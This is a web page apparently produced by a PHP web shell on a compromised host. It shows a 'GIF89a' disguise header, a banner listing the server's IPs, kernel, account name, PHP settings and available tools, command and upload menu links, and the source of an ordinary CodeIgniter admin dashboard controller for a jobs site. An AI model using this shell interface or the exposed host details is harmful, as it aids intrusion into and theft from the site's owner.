GIF89a;
Server IP : 172.26.0.195 / Your IP : 52.15.136.223 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../css/../jobs/application/controllers/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * Description of Dashboard * * @author Softpro India Pvt. Ltd */ class Dashboard extends CI_Controller { //put your code here public function __construct() { parent::__construct(); $this->load->model("admin/CategoryManagement"); $this->load->model("admin/DepartmentManagement"); $this->load->model("admin/VacancyManagement"); $this->load->model("user/ApplicationManagement"); $this->load->model("admin/SessionManagement"); $this->load->model("admin/Reports/DashboardReports"); } public function index() { if ($this->sessionvalidator->validateSession()) { $viewData["sessions"] = $this->SessionManagement->getSessions('T', 'F')->result(); $viewData["totalCategoryCount"] = $this->DashboardReports->getTotalCategoryCount()->result(); $viewData["totalDepartmentCount"] = $this->DepartmentManagement->getDepartments()->result(); $viewData["totalOpeningCount"] = $this->DashboardReports->getTotalOpenings()->result(); $viewData["totalApplicationCount"] = $this->DashboardReports->getTotalApplicationCount()->result(); $viewData["openingsPerSession"] = $this->DashboardReports->getOpeningsPerSessionReportInJSON(); $viewData["applicationsPerDepartmentForCurrentSession"] = $this->DashboardReports->getApplicationPerDepartmentReportInJSON(); $viewData["applicationsPerCategoryForCurrentSession"] = $this->DashboardReports->getApplicationPerCategoryReportInJSON(); $viewData["applicationsPerDesignationForCurrentSession"] = $this->DashboardReports->getApplicationPerDesignationReportInJSON(); $viewData["selectedSessionId"]=0; //print_r($viewData["applicationsPerCategoryForCurrentSession"]); //exit; $this->load->view("admin/dashboard", $viewData); } else { redirect("admin"); } } public function differentSession() { if ($this->sessionvalidator->validateSession()) { $selectedSession = $this->input->post('session'); $viewData["sessions"] = $this->SessionManagement->getSessions('T', 'F')->result(); $viewData["totalCategoryCount"] = $this->DashboardReports->getTotalCategoryCount()->result(); $viewData["totalDepartmentCount"] = $this->DepartmentManagement->getDepartments()->result(); $viewData["totalOpeningCount"] = $this->DashboardReports->getTotalOpenings($selectedSession)->result(); $viewData["totalApplicationCount"] = $this->DashboardReports->getTotalApplicationCount($selectedSession)->result(); $viewData["openingsPerSession"] = $this->DashboardReports->getOpeningsPerSessionReportInJSON($selectedSession); $viewData["applicationsPerDepartmentForCurrentSession"] = $this->DashboardReports->getApplicationPerDepartmentReportInJSON($selectedSession); $viewData["applicationsPerCategoryForCurrentSession"] = $this->DashboardReports->getApplicationPerCategoryReportInJSON($selectedSession); $viewData["applicationsPerDesignationForCurrentSession"] = $this->DashboardReports->getApplicationPerDesignationReportInJSON($selectedSession); $viewData["selectedSessionId"]=$selectedSession; $this->load->view("admin/dashboard", $viewData); } else { redirect("admin"); } } }